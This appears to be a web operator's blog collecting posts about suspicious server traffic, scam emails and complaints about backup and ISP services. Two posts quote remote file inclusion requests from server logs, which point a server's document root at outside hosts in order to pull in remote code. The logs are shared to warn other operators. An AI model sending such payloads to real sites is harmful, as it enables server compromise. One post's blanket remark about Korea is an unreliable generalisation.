Googlebot imposter

5/24/2010 8:41:34 AM
62.148.177.239
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) GET

Googlebot imposter - qwest

5/24/2010 2:51:03 AM
97.118.214.144
Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
OK
GET

Googlebot imposter - Scanning for Word Press

5/24/2010 10:04:26 AM
72.10.167.106
http://[domain].com/test/wordpress/wp-login.php
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
GET

Google Imposter

Getting traffic from this IP on the planet: 174.132.117.162

Claims to be a google bot: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

Doubtful because Google traffic typically comes from Google networks. Additionally the requests are bad.

This IP address: 66.232.142.64

Hostway Corporation HOSTWAY-2BLK (NET-66-232-128-0-1)
66.232.128.0 - 66.232.159.255
Hostway-KR HW-66-232-136-22 (NET-66-232-136-0-1)
66.232.136.0 - 66.232.143.255


Is attempting to pass this request parameter to our server:

<_SERVER[DOCUMENT_ROOT]>http://www.kumdo.org/image/banner4.gif???

Kumdo.org resolves to this IP address in Korea:

inetnum: 222.96.0.0 - 222.122.255.255
netname: KORNET
descr: KOREA TELECOM
descr: Network Management Center
country: KR
admin-c: DL248-AP
tech-c: GK40-AP
remarks: ***********************************************
remarks: KRNIC of NIDA is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the NIDA Whois DB
remarks: http://whois.nida.or.kr/english/index.html
remarks: ***********************************************
status: Allocated Portable
mnt-by: MNT-KRNIC-AP
changed: hm-changed@apnic.net 20031027
changed: hm-changed@apnic.net 20041007
source: APNIC

person: Dong-Joo Lee
address: 128-9 Yeong-Dong Jongro-Ku Seoul
address: Network Management Center
country: KR
phone: +82-2-766-1407
fax-no: +82-2-766-6008
e-mail: ip@krnic.kornet.net
e-mail: abuse@kornet.net
nic-hdl: DL248-AP
mnt-by: MAINT-NEW
changed: hostmaster@nic.or.kr 20061010
source: APNIC

person: Gyung-Jun Kim
address: KORNET
address: 128-9, Yeong-Dong, Jongro-Ku
address: SEOUL
address: 110-763
country: KR
phone: +82-2-747-9213
fax-no: +82-2-3673-5452
e-mail: ip@krnic.kornet.net
e-mail: abuse@kornet.net
nic-hdl: GK40-AP
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20061009
source: APNIC

Bad Headers - Malware, Plugin or?

We're seeing a bunch of requests that look like they were altered and not the original request from the client machine. It could be virus software, malware, proxy servers, caching servers on networks - who knows. Hopefully it is not an evil plugin or someone spying on network traffic.

Here are some of the IP addresses that had this weird header issue recently:

11/23/2009 8:57:02 PM 76.104.180.131 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
11/22/2009 8:32:58 PM 71.234.217.226 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; Comcast Install 1.0; GTB6; .NET CLR 1.1.4322)
11/22/2009 7:39:31 AM 63.226.217.184 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; IEMB3;
11/22/2009 7:10:29 AM 173.66.61.177 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1)
11/21/2009 6:57:42 AM 67.40.212.30 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; IEMB3;
11/20/2009 5:11:09 PM 67.161.88.107 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Comcast Install 1.0; GTB6; .NET CLR 1.1.4322)
11/18/2009 4:54:27 PM 209.91.40.80 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0
11/17/2009 9:02:20 AM 216.254.19.10 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)
11/15/2009 6:11:47 PM 98.247.251.172 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MathPlayer 2.10; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729;
11/15/2009 10:06:02 AM 76.22.123.218 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)
11/14/2009 11:45:21 AM 98.174.211.179 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
11/14/2009 9:46:00 AM 174.113.26.207 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 GTB5 (.NET CLR 3.5.30729)
11/14/2009 4:06:48 AM 96.18.203.27 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6; .NET CLR 1.1.4322)
11/13/2009 9:16:07 PM 67.171.37.175 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
11/13/2009 8:22:26 PM 24.113.197.5 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)
11/11/2009 10:31:57 PM 96.26.232.125 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)
11/11/2009 12:46:39 PM 98.237.128.105 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 3.0; .NET CLR 3.0.4506.2152; .NET CL
11/10/2009 8:52:51 AM 71.37.54.113 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1)
11/8/2009 7:52:24 PM 75.111.19.240 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15
11/7/2009 10:50:38 PM 71.227.255.37 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
11/7/2009 10:50:12 PM 71.227.255.37 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)
11/7/2009 5:45:34 PM 24.17.66.221 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; Zango 10.3.85.0)
11/7/2009 4:03:05 PM 71.227.155.229 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)
11/7/2009 1:00:12 PM 67.185.148.232 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 3.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
11/5/2009 10:59:14 PM 67.171.34.181 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
11/5/2009 6:30:41 PM 66.8.185.228 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
11/5/2009 4:42:05 PM 67.171.34.181 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
11/5/2009 4:09:26 PM 67.171.34.181 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
11/5/2009 2:09:18 PM 67.171.34.181 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
11/5/2009 1:55:29 PM 71.194.250.75 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15
11/3/2009 5:49:21 PM 24.18.214.26 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)
11/3/2009 9:24:01 AM 98.232.12.107 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
11/3/2009 9:21:40 AM 96.26.255.77 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
11/3/2009 9:05:57 AM 24.18.227.177 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)
11/3/2009 7:07:03 AM 97.113.236.36 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)
11/2/2009 5:29:23 PM 207.172.136.97 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
10/30/2009 11:44:14 PM 67.183.56.30 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.3; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30
10/30/2009 11:44:13 PM 67.183.56.30 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.3; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30
10/30/2009 11:44:27 AM 131.191.65.125 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)
10/27/2009 6:28:27 PM 71.112.251.46 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.3072
10/27/2009 6:28:27 PM 71.112.251.46 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.3072
10/25/2009 8:25:20 PM 174.21.95.103 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
10/24/2009 4:36:59 PM 75.92.212.208 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Zune 4.0)
10/22/2009 3:25:26 AM 69.85.109.91 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
10/21/2009 12:55:41 PM 24.16.92.189 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
10/19/2009 5:03:33 PM 76.28.193.198 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5
10/17/2009 10:07:48 AM 24.18.214.26 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
10/13/2009 12:39:53 PM 98.225.57.246 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; WinTSI 10.10.2009)
10/11/2009 10:19:35 AM 209.143.5.210 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)
10/10/2009 1:47:04 PM 64.136.26.227 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2; .NET CLR 2.0.50727; .NE
10/6/2009 7:59:57 PM 63.226.219.30 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .
10/6/2009 1:52:07 PM 64.146.149.194 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
10/5/2009 5:20:18 PM 67.160.3.12 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; .NET CLR 2.0.50727; .
10/5/2009 4:57:52 PM 98.232.9.64 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.14
10/4/2009 5:28:20 PM 75.92.211.243 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
10/3/2009 8:40:36 PM 98.117.109.217 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)
10/3/2009 4:45:31 PM 71.227.155.229 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)
10/2/2009 3:56:39 AM 161.53.179.226 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
10/2/2009 3:55:57 AM 161.53.179.232 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
10/1/2009 8:36:55 PM 67.171.39.2 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14
10/1/2009 4:49:42 PM 70.193.96.120 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; MS-RTC LM 8)

Norton Online Backup

OK I tried Quickbooks/Intuit online backup and that went pretty fast. However somehow a letter in my email got transposed and I had a heck of a time trying to get my data off their system - and someone had previously registered that transposed domain name so not sure if someone actually ripped off the stuff I backed up over there.

I thought I would try an alternate service - Norton Online Backup. I cannot believe how long it takes for this backup service to run compared to the previous service. I can run the thing all night practically and it's not done by morning.

Also the app is a total pig. It eats up tons of memory and bandwidth. Yes, there's a bandwidth throttle so maybe I'll try that. But if I leave the service running and boot up my machine the whole thing grinds to a halt. When trying to use my machine when the service is running it is pretty much unusable.

So, I have to turn off the service and stop the automatic start up and then when I want to run the backup, turn it back on.

Norton really needs to fix these issues if it wants to be a contender in this space.

Errors Trying to Use Windows Update

I was having a strange problem with Word not fully opening even when I maximize the screen. That led me to use Windows Update and got a few errors. Screen shots below.

Bad Traffic - Monitoring (ripping off?) our sites

Traffic from these two networks have been monitoring one of our sites and I believe scraping content to rip off or reverse engineer search engine rankings. Check your logs. Block them. (If you think it looks fishy like I do).

Rackspace.com, Ltd. RSCP-NET-4 (NET-174-143-0-0-1)
174.143.0.0 - 174.143.255.255
Slicehost RSPC-1251808572434376 (NET-174-143-180-0-1)
174.143.180.0 - 174.143.183.255

Object Software Development SEANET-CBLK (NET-199-181-164-0-1)
199.181.164.0 - 199.181.168.255
Seanet Corporation SEANET01-NET01 (NET-199-181-165-0-1)
199.181.165.0 - 199.181.167.255

Bad Traffic from Korea

Not sure what this nonsense is and how it is even getting directed to our server. The web addresses below are not even on our server but somehow this showed up in our logs and generating errors:

222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal/PayPal.html///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-"
"Mozilla/5.0" -

This is coming from a common spamming/hacking part of the world - Korea:

inetnum: 222.231.0.0 - 222.231.63.255
netname: KIDC
descr: Korea Internet Data Center
descr: KIDC Bldg, 261-1, Nonhyun-dong, Kangnam-ku, Seoul, 135-010
country: KR

Problems with AT&T Modem Disconnecting

I was having random problems with my AT&T air card disconnecting randomly. Also could not connect at AT&T Hotspots like Starbucks even though supposedly this is included in the service. I went to the store multiple times to resolve this issue and they called various tech support lines. The tech support people told me to click options and do random things in the AT&T Connection manager that didn't exist for me. I kept telling the people in the store that there is something going on here with the software and maybe I don't have the right version or something. However it was very difficult to troubleshoot because they don't HAVE a hotspot in the AT&T stores I went to which I think is kind of ridiculous. It is an easy thing to do and can easily help customers troubleshoot...so I walked down to the Starbucks down the street and the guy from the store was going to go down there and meet me to figure it out...after spending a good deal of time trying to get ahold of tech support already. Of course we'd have to drop the phone call with tech support to do this, and being as software engineer / tech person was not convinced this was going to work because it really seemed like the AT&T store personnel did not have the needed information or understanding of this software and service to resolve the problem. I went to the Starbucks and of course waited so long there my laptop battery died before the AT&T person got there - and since I was not convinced this would work I gave up. I am busy so I just worked with the AT&T card as is for a while - until it dropped connections so many times at a hotspot it was driving me nuts. So...I got the little brochure at Starbucks and called the number on the back and sat on hold forever. Because I am persistent when I actually want to solve a problem. Finally got a guy and in about two seconds he tells me I have old software and I need to contact AT&T Mobility. The software update in my AT&T connection manager obviously isn't working (version 6.5.7.0). So I asked him for the phone number to call (thank god) before he transferred me. And of course when he transferred me the call failed and I had to go through 3 or 4 menus and wait on hold again to get to someone, who finally directed me to the page with the update for the AT&T software for my air card.

Questions:

1. WHY AT&T can you not make these software updates easily available on your web page where you have information about my products and services and probably can even have a button to click to see if my software is up to date or not?

2. And WHY AT&T can you not inform your staff in your stores this one simple thing - how to update software associated with your various products.

3. And PLEASE, WHY AT&T don't you run hotspots in your stores to help customers resolve these issues in a few minutes rather than hours, weeks, days....frustration.

Just a suggestion!!

Strange Traffic in Logs - a bunch from Canada

There is something bizarre going on in our logs. It is interesting that the first of such links comes from aQuantive - now Microsoft advertising.

We have a site that is running some Google advertising supposedly (did not set this up myself). There is a bunch of traffic - all from different networks in Canada - where these visitors hit that ad landing page, then jump over to another web site on our server.

Not sure if they are attempting to hack the form and ending up on the wrong page, or if some other weird thing is going on.

For this particular company, it is highly unlikely that 10 or 20 visitors per day in Canada are clicking on their ads legitimately (if that is in fact the source).

Additionally there are strange Google redirect links in our logs, and a lot of searches in Google.ca (Google Canada) that are ending up at this site.

Seems like some funny business but cannot quite figure out what they are trying to do.

One thing I noticed is that initial attempts at this type of traffic were coming from international locations other than Canada, some of which we have blocked. Perhaps because they cannot get to the site via these locations they set up shop in Canada and attempt to access our site through some weird redirect through a form. Will have to keep looking into that.

The traffic started on September 1st 2009. Here are the IP addresses involved:

10/9/2009 8:30:38 PM 70.83.96.135
10/9/2009 8:27:18 PM 70.83.96.135
10/9/2009 4:52:29 PM 99.240.97.84
10/9/2009 12:54:38 PM 99.248.203.79
10/9/2009 9:07:30 AM 24.186.175.130
10/9/2009 9:06:41 AM 24.186.175.130
10/9/2009 9:06:22 AM 24.186.175.130
10/9/2009 9:05:35 AM 24.186.175.130
10/9/2009 9:04:51 AM 24.186.175.130
10/9/2009 9:04:06 AM 216.239.45.19
10/9/2009 9:03:34 AM 216.239.45.19
10/9/2009 9:02:25 AM 216.239.45.19
10/8/2009 11:52:36 PM 98.111.75.233
10/8/2009 11:41:25 AM 99.230.181.71
10/8/2009 11:41:03 AM 99.230.181.71
10/8/2009 11:16:19 AM 65.254.6.82
10/8/2009 11:10:52 AM 68.178.43.83
10/8/2009 11:05:59 AM 24.177.28.130
10/8/2009 10:23:32 AM 70.79.189.119
10/8/2009 10:23:26 AM 70.79.189.119
10/8/2009 10:18:40 AM 98.243.28.190
10/8/2009 9:24:55 AM 71.126.247.202
10/8/2009 7:37:24 AM 64.72.8.3
10/8/2009 7:36:28 AM 64.72.8.3
10/8/2009 7:36:28 AM 64.72.8.3
10/7/2009 10:25:02 PM 76.174.128.45
10/7/2009 9:48:20 PM 98.247.76.189
10/7/2009 9:46:38 PM 98.247.76.189
10/7/2009 9:38:59 PM 98.247.76.189
10/6/2009 12:02:20 PM 64.62.114.34
10/5/2009 9:13:58 PM 98.247.76.189
10/5/2009 9:13:18 PM 98.247.76.189
10/5/2009 9:12:00 PM 98.247.76.189
10/5/2009 4:29:15 PM 64.105.65.4
10/5/2009 8:09:05 AM 24.18.190.143
10/2/2009 5:58:09 PM 98.247.76.189
10/2/2009 5:09:25 PM 98.247.76.189
10/2/2009 4:12:45 PM 98.247.76.189
10/2/2009 3:57:34 PM 98.247.76.189
10/2/2009 3:46:32 PM 98.247.76.189
10/2/2009 7:48:34 AM 64.105.65.105
9/29/2009 4:47:54 PM 67.171.17.196
9/28/2009 4:49:28 PM 70.102.156.98
9/24/2009 1:25:39 PM 72.86.22.146
9/24/2009 1:01:32 PM 72.86.22.146
9/21/2009 3:58:43 PM 76.22.80.65
9/10/2009 2:14:01 PM 76.28.231.49
9/2/2009 4:24:01 PM 71.39.140.20
9/1/2009 3:09:50 PM 216.99.5.100
9/1/2009 3:09:23 PM 216.99.5.100

Mining Tax Shelter

This was sent to one of our customers - probably illegal or some kind of scam.

Hello,
My name is George Deden and I am President of Glacier Valley Mining and Metals. We have an opportunity for your company while assisting us in our company goals. We are seeking a company that is proactive and responsive to their client?s needs and one that has a data base of potential investors in our IRS registered tax shelter. We are seeking a company to place these investment units. The IRS provides for a fee for placement of these units. This is an active involvement and not a passive investment. Please visit our web site at www.gvmtaxshelter.com for further information.
This mining tax shelter is for those who receive no benefit from the current economic stimulus package, and for those who will see their tax rates go higher in the future. This also provides the investor with a three to one write off with a potential three to one return.
Simply put this is not a gamble. It is an opportunity. We value gold at $400.00 per ounce. We are the source. For example if you bought a head of lettuce at the market and paid two dollars for it?that is what it cost. If you go to the wholesaler you can get it for a dollar fifty, but if you go to the source (farmer) you can get it for a dollar a head. We are the source.
Best Regards, George Deden
President, GVMM
562-400-0411
gjdeden@gvmtaxshelter.com
___

Came from this IP: 66.91.83.205

OrgName: Road Runner HoldCo LLC
OrgID: RRWE
Address: 13241 Woodland Park Road
City: Herndon
StateProv: VA
PostalCode: 20171
Country: US

ReferralServer: rwhois://ipmt.rr.com:4321

NetRange: 66.91.0.0 - 66.91.255.255

Strange referrer - stream://1/ - speakeasy network

We're getting some strange traffic from this u: stream://1/

The traffic is coming from the Speakeasy network: 216.231.44.147

Speakeasy, Inc. SPEAKEASY-1 (NET-216-231-32-0-1)
216.231.32.0 - 216.231.63.255
Speakeasy Network -- DSL SPEK-DSL-BR1-1 (NET-216-231-42-0-1)
216.231.42.0 - 216.231.50.255

Bad Traffic - Hurricane Electric (again)

Seems like we often get mysterious traffic from Hurrican Electric. In this case, traffic from the network below is attempting to access non-existent shopping carts on our system:

Hurricane Electric, Inc. HURRICANE-4 (NET-65-19-128-0-1)
65.19.128.0 - 65.19.191.255
EGIHosting HURRICANE-CE1290-5430 (NET-65-19-129-16-1)
65.19.129.16 - 65.19.129.31
BSNEWLINE BSNEWLINE-1 (NET-65-19-129-16-2)
65.19.129.16 - 65.19.129.31

Weird Job Proposals from Mary Kay

Getting proposals to work for a job and wondering if this is legit.

The email is supposedly from MaryKay but I always get responses in the middle of the night at like 3 a.m.

They don't respond to the emails correctly and when I said I'm still not interested they keep trying to get reference contact information and personal details.

Maybe it's legit, I'm not sure. Just kind of weird.

Delivered-To:
Received: by 10.142.193.11 with SMTP id q11cs69747wff;
Thu, 3 Sep 2009 03:17:50 -0700 (PDT)
Received: by 10.90.22.18 with SMTP id 18mr7054118agv.20.1251973069978;
Thu, 03 Sep 2009 03:17:49 -0700 (PDT)
Return-Path:
Received: from psmtp.com (exprod7mx164.postini.com [64.18.2.69])
by mx.google.com with SMTP id 21si1589296agb.25.2009.09.03.03.17.47
(version=TLSv1/SSLv3 cipher=RC4-MD5);
Thu, 03 Sep 2009 03:17:48 -0700 (PDT)
Received-SPF: pass (google.com: domain of marykayincorporated@gmail.com designates 64.18.2.69 as permitted sender) client-ip=64.18.2.69;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of marykayincorporated@gmail.com designates 64.18.2.69 as permitted sender) smtp.mail=marykayincorporated@gmail.com; dkim=pass (test mode) header.i=@gmail.com
Received: from source ([209.85.220.166]) by exprod7mx164.postini.com ([64.18.6.14]) with SMTP;
Thu, 03 Sep 2009 06:17:48 EDT
Received: by fxm10 with SMTP id 10so442739fxm.1
for <>; Thu, 03 Sep 2009 03:17:46 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=gmail.com; s=gamma;
h=domainkey-signature:mime-version:sender:received:in-reply-to
:references:date:x-google-sender-auth:message-id:subject:from:to
:content-type:content-transfer-encoding;
bh=CwZNcLXFIGZyzEfPyjZIHI56PCgsgs0XqS2STBQhGb8=;
b=Y+UooH+6VyEsb8BcIupC0QT1z9oaKkZei4wShf7jXTM9jH8uMCayulyoh7Mgt0JFqg
BpQ8Qtw2XYIrSHvS6XglNbBIMIiJCxGRU/WZFq21wdBxNYQ9Qx3Ihe8UQ6lgF+s4Zqjk
fOlAFlynC3JtUGqFc18PJ03wInW39Bjm/O/KA=
DomainKey-Signature: a=rsa-sha1; c=nofws;
d=gmail.com; s=gamma;
h=mime-version:sender:in-reply-to:references:date
:x-google-sender-auth:message-id:subject:from:to:content-type
:content-transfer-encoding;
b=LTSsjxvD9obo6MC4hhzER9fu0fGotOZSBMgNoiDdD2wgGlCovm+pdGMuP8zF1KrnaB
zoPsUI/ZH+LNl5n7xCab/58IbFo2iHhBPNM4J2cWvEuJ/rH8fh8RtWh5n4i6UWUhE9gB
48P3UidlIUOt+pO+k2xPa4UWrb1588N5GYa9o=
MIME-Version: 1.0
Sender: marykayincorporated@gmail.com
Received: by 10.204.8.21 with SMTP id f21mr7791449bkf.129.1251973066018; Thu,
03 Sep 2009 03:17:46 -0700 (PDT)
In-Reply-To: <7259BF6AEF584DF99A9C756D39D02220@>
References: <62166.64.12.112.193.1251693960.squirrel@gator985.hostgator.com>
<7259BF6AEF584DF99A9C756D39D02220@>
Date: Thu, 3 Sep 2009 11:17:44 +0100
X-Google-Sender-Auth: ec55662c1fd1dfa6
Message-ID: <9a93579d0909030317q7bee570ft5a5befd8ced8b03b@mail.gmail.com>
Subject: Re: Notice of Shortlistment for Vacant Position at Mary Kay Inc
From: Human Resources Department
To:
Content-Type: text/plain; charset=windows-1252
Content-Transfer-Encoding: quoted-printable
X-pstn-neptune: 0/0/0.00/0
X-pstn-levels: (S:19.46979/99.90000 CV:99.9000 FC:95.5390 LC:93.6803 R:95.9108 P:95.9108 M:97.0282 C:98.6951 )
X-pstn-settings: 1 (0.1500:0.1500) cv gt3 gt2 gt1 r p m c
X-pstn-addresses: from [447/28]

Norton Online Backup - Not Good

I switched from Intuit online backup which was ridden with security problems and support staff in or from India that clearly had no clue what they were talking about, to Norton online backup. I was hoping for better security.

I am not sure if the security is good but it doesn't matter because I cannot get Norton Online Backup to even back up all my files. I paid for the extra storage and I run the backup service for hours at a time - I've run it overnight a couple of times - and it always errors out or just never finishes.

What whatever Norton Online Backup is doing is not efficient, that much is for sure. They must be restarting the entire backup when it fails mid stream or something and not tracking what has and has not already been backed up and/or what has changed because it has NEVER finished!

Additionally it seems they are not doing any type of file compression because it should not be taking this long.

My only hope is that my backups are not being somehow diverted to some slower network or third party that is causing this problem.

I would try Amazon backup services but there has been so much hacker traffic coming from their networks hitting our servers I don't trust that whole S3 network or whatever it is.

When is someone, anyone, going to create a TRULY secure and efficient backup service where the people supporting it cannot get into it, change the accounts to create a copy of the backups, or see the files...and has all the appropriate auditing to keep things secure on an on-going basis.

